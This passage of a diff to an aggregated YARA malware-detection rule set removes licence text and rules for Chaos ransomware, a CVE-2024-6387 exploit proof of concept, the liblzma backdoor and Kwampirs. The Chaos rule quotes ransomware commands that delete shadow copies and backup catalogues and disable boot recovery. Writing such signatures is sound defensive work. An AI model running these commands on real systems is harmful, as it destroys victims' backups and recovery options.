( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 76 6c 66 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 76 6b 6d ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 33 70 6d ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 76 61 77 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 63 61 61 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 63 61 6c 66 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 67 67 6f ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 61 6d 77 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 72 61 72 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 7a 37 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 7a 67 72 61 74 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 6f 73 69 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 6c 6d 74 68 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 6c 6d 65 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 6d 74 68 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 66 74 72 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 6d 68 63 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 61 74 68 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 6b 6e 6c ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 73 6c 78 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 63 6f 64 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 6d 63 6f 64 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + + condition: + 1 of them } /* * YARA Rule Set * Repository Name: craiu * Repository: https://github.com/craiu/yararules - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: 23cf0ca22021fa3684e180a18416b9ae1b695243 * Number of Rules: 13 * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance) @@ -214422,21804 +216354,20636 @@ be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by -this License without regard to the additional permissions. - - When you convey a copy of a covered work, you may at your option -remove any additional permissions from that copy, or from any part of -it. (Additional permissions may be written to require their own -removal in certain cases when you modify the work.) You may place -additional permissions on material, added by you to a covered work, -for which you have or can give appropriate copyright permission. - - Notwithstanding any other provision of this License, for material you -add to a covered work, you may (if authorized by the copyright holders of -that material) supplement the terms of this License with terms: - - a) Disclaiming warranty or limiting liability differently from the - terms of sections 15 and 16 of this License; or - - b) Requiring preservation of specified reasonable legal notices or - author attributions in that material or in the Appropriate Legal - Notices displayed by works containing it; or - - c) Prohibiting misrepresentation of the origin of that material, or - requiring that modified versions of such material be marked in - reasonable ways as different from the original version; or - - d) Limiting the use for publicity purposes of names of licensors or - authors of the material; or - - e) Declining to grant rights under trademark law for use of some - trade names, trademarks, or service marks; or - - f) Requiring indemnification of licensors and authors of that - material by anyone who conveys the material (or modified versions of - it) with contractual assumptions of liability to the recipient, for - any liability that these contractual assumptions directly impose on - those licensors and authors. - - All other non-permissive additional terms are considered "further -restrictions" within the meaning of section 10. If the Program as you -received it, or any part of it, contains a notice stating that it is -governed by this License along with a term that is a further -restriction, you may remove that term. If a license document contains -a further restriction but permits relicensing or conveying under this -License, you may add to a covered work material governed by the terms -of that license document, provided that the further restriction does -not survive such relicensing or conveying. - - If you add terms to a covered work in accord with this section, you -must place, in the relevant source files, a statement of the -additional terms that apply to those files, or a notice indicating -where to find the applicable terms. - - Additional terms, permissive or non-permissive, may be stated in the -form of a separately written license, or stated as exceptions; -the above requirements apply either way. - - 8. Termination. - - You may not propagate or modify a covered work except as expressly -provided under this License. Any attempt otherwise to propagate or -modify it is void, and will automatically terminate your rights under -this License (including any patent licenses granted under the third -paragraph of section 11). - - However, if you cease all violation of this License, then your -license from a particular copyright holder is reinstated (a) -provisionally, unless and until the copyright holder explicitly and -finally terminates your license, and (b) permanently, if the copyright -holder fails to notify you of the violation by some reasonable means -prior to 60 days after the cessation. - - Moreover, your license from a particular copyright holder is -reinstated permanently if the copyright holder notifies you of the -violation by some reasonable means, this is the first time you have -received notice of violation of this License (for any work) from that -copyright holder, and you cure the violation prior to 30 days after -your receipt of the notice. - - Termination of your rights under this section does not terminate the -licenses of parties who have received copies or rights from you under -this License. If your rights have been terminated and not permanently -reinstated, you do not qualify to receive new licenses for the same -material under section 10. - - 9. Acceptance Not Required for Having Copies. - - You are not required to accept this License in order to receive or -run a copy of the Program. Ancillary propagation of a covered work -occurring solely as a consequence of using peer-to-peer transmission -to receive a copy likewise does not require acceptance. However, -nothing other than this License grants you permission to propagate or -modify any covered work. These actions infringe copyright if you do -not accept this License. Therefore, by modifying or propagating a -covered work, you indicate your acceptance of this License to do so. - - 10. Automatic Licensing of Downstream Recipients. - - Each time you convey a covered work, the recipient automatically -receives a license from the original licensors, to run, modify and -propagate that work, subject to this License. You are not responsible -for enforcing compliance by third parties with this License. - - An "entity transaction" is a transaction transferring control of an -organization, or substantially all assets of one, or subdividing an -organization, or merging organizations. If propagation of a covered -work results from an entity transaction, each party to that -transaction who receives a copy of the work also receives whatever -licenses to the work the party's predecessor in interest had or could -give under the previous paragraph, plus a right to possession of the -Corresponding Source of the work from the predecessor in interest, if -the predecessor has it or can get it with reasonable efforts. - - You may not impose any further restrictions on the exercise of the -rights granted or affirmed under this License. For example, you may -not impose a license fee, royalty, or other charge for exercise of -rights granted under this License, and you may not initiate litigation -(including a cross-claim or counterclaim in a lawsuit) alleging that -any patent claim is infringed by making, using, selling, offering for -sale, or importing the Program or any portion of it. - - 11. Patents. - - A "contributor" is a copyright holder who authorizes use under this -License of the Program or a work on which the Program is based. The -work thus licensed is called the contributor's "contributor version". - - A contributor's "essential patent claims" are all patent claims -owned or controlled by the contributor, whether already acquired or -hereafter acquired, that would be infringed by some manner, permitted -by this License, of making, using, or selling its contributor version, -but do not include claims that would be infringed only as a -consequence of further modification of the contributor version. For -purposes of this definition, "control" includes the right to grant -patent sublicenses in a manner consistent with the requirements of -this License. - - Each contributor grants you a non-exclusive, worldwide, royalty-free -patent license under the contributor's essential patent claims, to -make, use, sell, offer for sale, import and otherwise run, modify and -propagate the contents of its contributor version. - - In the following three paragraphs, a "patent license" is any express -agreement or commitment, however denominated, not to enforce a patent -(such as an express permission to practice a patent or covenant not to -sue for patent infringement). To "grant" such a patent license to a -party means to make such an agreement or commitment not to enforce a -patent against the party. - - If you convey a covered work, knowingly relying on a patent license, -and the Corresponding Source of the work is not available for anyone -to copy, free of charge and under the terms of this License, through a -publicly available network server or other readily accessible means, -then you must either (1) cause the Corresponding Source to be so -available, or (2) arrange to deprive yourself of the benefit of the -patent license for this particular work, or (3) arrange, in a manner -consistent with the requirements of this License, to extend the patent -license to downstream recipients. "Knowingly relying" means you have -actual knowledge that, but for the patent license, your conveying the -covered work in a country, or your recipient's use of the covered work -in a country, would infringe one or more identifiable patents in that -country that you have reason to believe are valid. - - If, pursuant to or in connection with a single transaction or -arrangement, you convey, or propagate by procuring conveyance of, a -covered work, and grant a patent license to some of the parties -receiving the covered work authorizing them to use, propagate, modify -or convey a specific copy of the covered work, then the patent license -you grant is automatically extended to all recipients of the covered -work and works based on it. - - A patent license is "discriminatory" if it does not include within -the scope of its coverage, prohibits the exercise of, or is -conditioned on the non-exercise of one or more of the rights that are -specifically granted under this License. You may not convey a covered -work if you are a party to an arrangement with a third party that is -in the business of distributing software, under which you make payment -to the third party based on the extent of your activity of conveying -the work, and under which the third party grants, to any of the -parties who would receive the covered work from you, a discriminatory -patent license (a) in connection with copies of the covered work -conveyed by you (or copies made from those copies), or (b) primarily -for and in connection with specific products or compilations that -contain the covered work, unless you entered into that arrangement, -or that patent license was granted, prior to 28 March 2007. - - Nothing in this License shall be construed as excluding or limiting -any implied license or other defenses to infringement that may -otherwise be available to you under applicable patent law. - - 12. No Surrender of Others' Freedom. - - If conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot convey a -covered work so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you may -not convey it at all. For example, if you agree to terms that obligate you -to collect a royalty for further conveying from those to whom you convey -the Program, the only way you could satisfy both those terms and this -License would be to refrain entirely from conveying the Program. - - 13. Use with the GNU Affero General Public License. - - Notwithstanding any other provision of this License, you have -permission to link or combine any covered work with a work licensed -under version 3 of the GNU Affero General Public License into a single -combined work, and to convey the resulting work. The terms of this -License will continue to apply to the part which is the covered work, -but the special requirements of the GNU Affero General Public License, -section 13, concerning interaction through a network will apply to the -combination as such. - - 14. Revised Versions of this License. - - The Free Software Foundation may publish revised and/or new versions of -the GNU General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - - Each version is given a distinguishing version number. If the -Program specifies that a certain numbered version of the GNU General -Public License "or any later version" applies to it, you have the -option of following the terms and conditions either of that numbered -version or of any later version published by the Free Software -Foundation. If the Program does not specify a version number of the -GNU General Public License, you may choose any version ever published -by the Free Software Foundation. - - If the Program specifies that a proxy can decide which future -versions of the GNU General Public License can be used, that proxy's -public statement of acceptance of a version permanently authorizes you -to choose that version for the Program. - - Later license versions may give you additional or different -permissions. However, no additional obligations are imposed on any -author or copyright holder as a result of your choosing to follow a -later version. - - 15. Disclaimer of Warranty. - - THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY -APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT -HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY -OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, -THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR -PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM -IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF -ALL NECESSARY SERVICING, REPAIR OR CORRECTION. - - 16. Limitation of Liability. - - IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS -THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY -GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE -USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF -DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD -PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), -EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF -SUCH DAMAGES. - - 17. Interpretation of Sections 15 and 16. - - If the disclaimer of warranty and limitation of liability provided -above cannot be given local legal effect according to their terms, -reviewing courts shall apply local law that most closely approximates -an absolute waiver of all civil liability in connection with the -Program, unless a warranty or assumption of liability accompanies a -copy of the Program in return for a fee. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -state the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - <one line to give the program's name and a brief idea of what it does.> - Copyright (C) <year> <name of author> - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see <https://www.gnu.org/licenses/>. - -Also add information on how to contact you by electronic and paper mail. - - If the program does terminal interaction, make it output a short -notice like this when it starts in an interactive mode: - - <program> Copyright (C) <year> <name of author> - This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, your program's commands -might be different; for a GUI interface, you would use an "about box". - - You should also get your employer (if you work as a programmer) or school, -if any, to sign a "copyright disclaimer" for the program, if necessary. -For more information on this, and how to apply and follow the GNU GPL, see -<https://www.gnu.org/licenses/>. - - The GNU General Public License does not permit incorporating your program -into proprietary programs. If your program is a subroutine library, you -may consider it more useful to permit linking proprietary applications with -the library. If this is what you want to do, use the GNU Lesser General -Public License instead of this License. But first, please read -<https://www.gnu.org/licenses/why-not-lgpl.html>. - - */ -rule CRAIU_Crime_Chaos_Ransomware_Gen : FILE -{ - meta: - description = "Chaos ransomware generic strings" - author = "Costin G. Raiu, Art of Noh, craiu@noh.ro" - id = "e909f7e4-50c2-54a6-8274-9ef92f95bf93" - date = "2024-05-27" - modified = "2024-05-28" - reference = "https://blog.sonicwall.com/en-us/2024/05/politically-charged-ransomware-weaponized-as-a-file-destroyer/" - source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/crime_chaos_ransomware.yara#L2-L39" - license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" - hash = "524a898e18999ceac864dbac5b85fa2f14392e389b3c32f77d58e2a89cdf01c4" - logic_hash = "7d2e1c9178d5bf360cebc90056bbdae6a11729b1b3c5e963c522a29fd7ba7a3e" - score = 75 - quality = 60 - tags = "FILE" - version = "1.0" - - strings: - $a0 = "<Exponent>AQAB</Exponent>" ascii wide fullword - $a2 = "<EncryptedKey>" ascii wide fullword - $a15 = "vssadmin delete shadows /all /quiet & wmic shadowcopy delete" ascii wide fullword - $a16 = "bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no" ascii wide fullword - $a17 = "wbadmin delete catalog -quiet" ascii wide fullword - $a18 = "C:\\Users\\" ascii wide fullword - $a22 = "/9j/4AAQSkZJRgABAQAAAQABAAD/4gHYSUNDX1BST0ZJTEUAAQEAAAHIAAAAAAQwAABtbnRyUkdCIFhZWiAH4AABAAEAAAAAAABhY3NwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA9tYAAQAAAADTLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlkZXNjAAAA8AAAACRyWFlaAAABFAAAABRnWFlaAAABKAAAABRiWFlaAAABPAAAABR3dHB0AAABUAAAABRyVFJDAAABZAAAAChnVFJDAAABZAAAAChiVFJDAAABZAAAAChjcHJ0AAABjAAAADxtbHVjAAAAAAAAAAEAAAAMZW5VUwAAAAgAAAAcAHMAUgBHAEJYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAAt4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9YWVogAAAAAAAA9tYAAQAAAADTLXBhcmEAAAAAAAQAAAACZmYAAPKnAAANWQAAE9AAAApbAAAAAAAAAABtbHVjAAAAAAAAAAEAAAAMZW5VUwAAACAAAAAcAEcAbwBvAGcAbABlACAASQBuAGMALgAgADIAMAAxADb/2wBDAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/2wBDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/wAARCAQ4B4ADAREAAhEBAxEB/8QAHwAAAAYDAQEBAAAAAAAAAAAABAUGBwgJAgMKAQAL/8QAgRAAAQIDBQQIAwcCAgQIAAI7AQIRAwQhAAUGMUEHElFhCBMicYGRofCxwdEJFCMyQuHxFVIzYhYkQ3IKFzRTY4KSshglRHOi0uIZJlRkg5PCJzU2RVZYdJaXo9PWGkZHVVeEprO1KDllZ3V2eIaHlJWktLbDxtTV1zd3xMVmp8f" ascii wide fullword - $a24 = "17CqMQFeuB3NTzJ" ascii wide fullword - $a25 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" ascii wide fullword - $a26 = "7z459ajrk722yn8c5j4fg" ascii wide - $a27 = "2X28tfRmWaPyPQgvoHV" ascii wide - $a28 = "1qw0ll8p9m8uezhqhyd" ascii wide - $b11 = "\\Saved Games" ascii wide fullword - - condition: - ( filesize <9MB) and ( uint16(0)==0x5a4d) and ((3 of them )) -} -rule CRAIU_Exploit_CVE_2024_6387 : CVE_2024_6387 FILE -{ - meta: - description = "Strings from CVE-2024-6387 exploit PoC by zgzhang." - author = "Costin G. Raiu, TLPBLACK, craiu@noh.ro" - id = "6ac63016-864d-57af-bb36-3115a0a91021" - date = "2024-07-02" - modified = "2024-07-03" - reference = "https://github.com/zgzhang/cve-2024-6387-poc/tree/main" - source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/exploit_cve_2024_6387.yara#L2-L38" - license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" - hash = "62b06a6c30a0c891c2246ff87c0ad9ae03d2123601ba5331d6348c43b38d185e" - logic_hash = "d43a77c2690b5e01639590bc31fa64fa36b1da5efd3cc0761be7369ce80e4253" - score = 75 - quality = 85 - tags = "CVE-2024-6387, FILE" - version = "1.0" - - strings: - $a0 = "Attempting exploitation with glibc base: 0x%lx" ascii wide fullword - $a1 = "Attempt %d of 20000" ascii wide fullword - $a2 = "Failed to establish connection, attempt %d" ascii wide fullword - $a3 = "SSH handshake failed, attempt %d" ascii wide fullword - $a4 = "Possible exploitation success on attempt %d with glibc base 0x%lx!" ascii wide fullword - $a5 = "Received SSH version: %s" ascii wide fullword - $a6 = "Connection closed while receiving SSH version" ascii wide fullword - $a7 = "Received KEX_INIT (%zd bytes)" ascii wide fullword - $a8 = "Connection closed while receiving KEX_INIT" ascii wide fullword - $a9 = "Estimated parsing time: %.6f seconds" ascii wide fullword - $a10 = "Received response after exploit attempt (%zd bytes)" ascii wide fullword - $a11 = "Possible hit on 'large' race window" ascii wide fullword - $a12 = "Connection closed by server - possible successful exploitation" ascii wide fullword - $a13 = "No immediate response from server - possible successful exploitation" ascii wide fullword - $a14 = "Attempt %d of 10000" ascii wide fullword - - condition: - ( filesize <5MB) and ( uint32be(0)==0x7F454C46) and (4 of ($a*)) -} -rule CRAIU_Unk_Liblzma_Backdoor : FILE -{ - meta: - description = "liblzma backdoored" - author = "Costin G. Raiu, Art of Noh, craiu@noh.ro" - id = "3527227b-e19f-5704-8a56-f7d318890658" - date = "2024-03-30" - modified = "2024-03-30" - reference = "https://seclists.org/oss-sec/2024/q1/268" - source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/unk_liblzma_backdoor.yara#L1-L30" - license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" - hash = "8fa641c454c3e0f76de73b7cc3446096b9c8b9d33d406d38b8ac76090b0344fd" - hash = "319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae" - hash = "b418bfd34aa246b2e7b5cb5d263a640e5d080810f767370c4d2c24662a274963" - hash = "cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537" - logic_hash = "ac58a38bff3020dbc881a78b70cf18279644cf6f3ede8d652be3f345ba00974f" - score = 75 - quality = 85 - tags = "FILE" - version = "1.1" - - strings: - $a1 = {f3 0f 1e fa 55 48 89 f5 4c 89 ce 53 89 fb 81 e7 00 00 00 80 48 83 ec 28 48 89 54 24 18 48 89 4c 24 10} - $a2 = {48 BF 30 30 30 30 30 30 30 30 8B F1 49 89 D1 89 43 28 48 89 3C 24 BF 3F FC FF 03} - - condition: - ( uint32be(0)==0x7F454C46) and ( filesize <10MB) and ( any of them ) -} -rule CRAIU_Unk_Liblzma_Encstrings : FILE -{ - meta: - description = "liblzma backdoor, encoded strings" - author = "Costin G. Raiu, Art of Noh, craiu@noh.ro" - id = "ca491b9c-400e-5f5e-9372-e403a095edba" - date = "2024-03-30" - modified = "2024-03-30" - reference = "https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01" - source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/unk_liblzma_backdoor.yara#L32-L70" - license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" - logic_hash = "99f5c82f941bb5c1f908209e108f9f80a835ad84157a383faa0dde502486dbd3" - score = 75 - quality = 85 - tags = "FILE" - version = "1.0" - - strings: - $a1 = "yolAbejyiejuvnup=Evjtgvsh5okmkAvj" ascii wide - $a2 = { 04 00 10 08 03 00 00 00 03 00 00 00 03 00 00 00 04 00 78 06 03 00 00 00 03 00 00 00 30 00 0C 00 03 00 00 00 04 00 D8 00 - 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 43 00 00 00 32 00 00 00 03 00 00 00 03 00 00 00 13 01 00 00 - 92 00 00 00 12 00 00 00 42 00 00 00 93 00 00 00 62 00 00 00 B3 00 00 00 B2 00 00 00 03 00 00 00 03 00 00 00 93 00 00 00 - 42 00 00 00 C3 00 00 00 B2 00 00 00 03 00 00 00 12 00 00 00 04 00 08 07 04 00 08 01 12 00 00 00 63 00 00 00 03 00 00 00 - 13 00 00 00 F2 00 00 00 03 00 00 00 A3 00 00 00 92 00 00 00 33 01 00 00 F2 00 00 00 43 01 00 00 22 00 00 00 22 01 00 00 - 04 00 70 08 22 00 00 00 23 00 00 00 72 01 00 00 B3 01 00 00 92 00 00 00 83 00 00 00 23 00 00 00 82 01 00 00 63 01 00 00 - 13 00 00 00 04 00 A0 01 22 00 00 00 23 00 00 00 72 01 00 00 B3 01 00 00 B2 01 00 00 03 00 00 00 03 00 00 00 03 00 00 00 - 23 01 00 00 43 00 00 00 C2 00 00 00 90 01 30 00 72 00 00 00 21 01 04 00 03 01 00 00 92 00 00 00 22 01 00 00 32 00 00 00 } - $a3 = { - 33 01 00 00 D2 00 00 00 12 00 00 00 13 00 00 00 04 00 40 0C E2 00 00 00 03 00 00 00 53 01 00 00 22 01 00 00 04 00 D0 06 - E2 00 00 00 A3 00 00 00 92 00 00 00 53 01 00 00 A0 00 14 00 D2 01 00 00 04 00 58 09 62 00 00 00 92 00 00 00 04 00 18 04 - 42 01 00 00 13 00 00 00 B3 01 00 00 04 00 E0 04 33 00 00 00 A2 01 00 00 43 01 00 00 92 00 00 00 A2 00 00 00 33 02 00 00 - 72 01 00 00 10 00 40 00 A0 00 30 00 00 02 20 00 A2 00 00 00 21 00 0C 00 12 00 00 00 04 00 90 07 B2 01 00 00 53 00 00 00 - 93 01 00 00 92 00 00 00 22 01 00 00 83 01 00 00 53 00 00 00 82 00 00 00 32 01 00 00 03 02 00 00 62 01 00 00 63 01 00 00 - B2 00 00 00 22 01 00 00 33 00 00 00 33 00 00 00 73 00 00 00 04 00 18 00 D2 01 00 00 13 02 00 00 52 00 00 00 D3 00 00 00 - 02 01 00 00 C3 00 00 00 52 00 00 00 D3 00 00 00 B2 01 00 00 A3 01 00 00 23 00 00 00 E2 01 00 00 33 00 00 00 33 00 00 00 - B3 01 00 00 A2 00 00 00 53 00 00 00 B3 00 00 00 C2 01 00 00 D3 01 00 00 03 00 00 00 22 00 00 00 63 00 00 00 12 00 00 00 } - - condition: - ( filesize <15MB) and ( any of them ) -} -rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Dropperandmainpayload : KWAMPIRS -{ - meta: - description = "Kwampirs dropper and main payload components" - author = "Symantec" - id = "5a40a5e7-0b98-5f6e-a808-493676b57cda" - date = "2018-04-23" - modified = "2020-03-31" - reference = "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" - source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L2-L80" - license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" - logic_hash = "40e197f4278a2d14e8fe1359676558319e86728f7e61ddf612bcc894c311d53a" - score = 75 - quality = 85 - tags = "KWAMPIRS" - family = "Kwampirs" - - strings: - $pubkey = { - 06 02 00 00 00 A4 00 00 52 53 41 31 00 08 00 00 - 01 00 01 00 CD 74 15 BC 47 7E 0A 5E E4 35 22 A5 - 97 0C 65 BE E0 33 22 F2 94 9D F5 40 97 3C 53 F9 - E4 7E DD 67 CF 5F 0A 5E F4 AD C9 CF 27 D3 E6 31 - 48 B8 00 32 1D BE 87 10 89 DA 8B 2F 21 B4 5D 0A - CD 43 D7 B4 75 C9 19 FE CC 88 4A 7B E9 1D 8C 11 - 56 A6 A7 21 D8 C6 82 94 C1 66 11 08 E6 99 2C 33 - 02 E2 3A 50 EA 58 D2 A7 36 EE 5A D6 8F 5D 5D D2 - 9E 04 24 4A CE 4C B6 91 C0 7A C9 5C E7 5F 51 28 - 4C 72 E1 60 AB 76 73 30 66 18 BE EC F3 99 5E 4B - 4F 59 F5 56 AD 65 75 2B 8F 14 0C 0D 27 97 12 71 - 6B 49 08 84 61 1D 03 BA A5 42 92 F9 13 33 57 D9 - 59 B3 E4 05 F9 12 23 08 B3 50 9A DA 6E 79 02 36 - EE CE 6D F3 7F 8B C9 BE 6A 7E BE 8F 85 B8 AA 82 - C6 1E 14 C6 1A 28 29 59 C2 22 71 44 52 05 E5 E6 - FE 58 80 6E D4 95 2D 57 CB 99 34 61 E9 E9 B3 3D - 90 DC 6C 26 5D 70 B4 78 F9 5E C9 7D 59 10 61 DF - F7 E4 0C B3 - } - $network_xor_key = { - B7 E9 F9 2D F8 3E 18 57 B9 18 2B 1F 5F D9 A5 38 - C8 E7 67 E9 C6 62 9C 50 4E 8D 00 A6 59 F8 72 E0 - 91 42 FF 18 A6 D1 81 F2 2B C8 29 EB B9 87 6F 58 - C2 C9 8E 75 3F 71 ED 07 D0 AC CE 28 A1 E7 B5 68 - CD CF F1 D8 2B 26 5C 31 1E BC 52 7C 23 6C 3E 6B - 8A 24 61 0A 17 6C E2 BB 1D 11 3B 79 E0 29 75 02 - D9 25 31 5F 95 E7 28 28 26 2B 31 EC 4D B3 49 D9 - 62 F0 3E D4 89 E4 CC F8 02 41 CC 25 15 6E 63 1B - 10 3B 60 32 1C 0D 5B FA 52 DA 39 DF D1 42 1E 3E - BD BC 17 A5 96 D9 43 73 3C 09 7F D2 C6 D4 29 83 - 3E 44 44 6C 97 85 9E 7B F0 EE 32 C3 11 41 A3 6B - A9 27 F4 A3 FB 2B 27 2B B6 A6 AF 6B 39 63 2D 91 - 75 AE 83 2E 1E F8 5F B5 65 ED B3 40 EA 2A 36 2C - A6 CF 8E 4A 4A 3E 10 6C 9D 28 49 66 35 83 30 E7 - 45 0E 05 ED 69 8D CF C5 40 50 B1 AA 13 74 33 0F - DF 41 82 3B 1A 79 DC 3B 9D C3 BD EA B1 3E 04 33 - } - $decrypt_string = { - 85 DB 75 09 85 F6 74 05 89 1E B0 01 C3 85 FF 74 - 4F F6 C3 01 75 4A 85 F6 74 46 8B C3 D1 E8 33 C9 - 40 BA 02 00 00 00 F7 E2 0F 90 C1 F7 D9 0B C8 51 - E8 12 28 00 00 89 06 8B C8 83 C4 04 33 C0 85 DB - 74 16 8B D0 83 E2 0F 8A 92 1C 33 02 10 32 14 38 - 40 88 11 41 3B C3 72 EA 66 C7 01 00 00 B0 01 C3 - 32 C0 C3 - } - $init_strings = { - 55 8B EC 83 EC 10 33 C9 B8 0D 00 00 00 BA 02 00 - 00 00 F7 E2 0F 90 C1 53 56 57 F7 D9 0B C8 51 E8 - B3 27 00 00 BF 05 00 00 00 8D 77 FE BB 4A 35 02 - 10 2B DE 89 5D F4 BA 48 35 02 10 4A BB 4C 35 02 - 10 83 C4 04 2B DF A3 C8 FC 03 10 C7 45 FC 00 00 - 00 00 8D 4F FC 89 55 F8 89 5D F0 EB 06 - } - - condition: - (2 of them ) -} -rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Shamoon_Code : FILE -{ - meta: - description = "Kwampirs and Shamoon common code" - author = "FBI / cywatch@fbi.gov" - id = "0d403b3b-a5a8-5ac6-a12d-7181a1ad11b3" - date = "2020-01-14" - modified = "2020-03-31" - reference = "https://assets.documentcloud.org/documents/6821582/FLASH-CP-000118-MW-Downgraded-Version.pdf" - source_url = 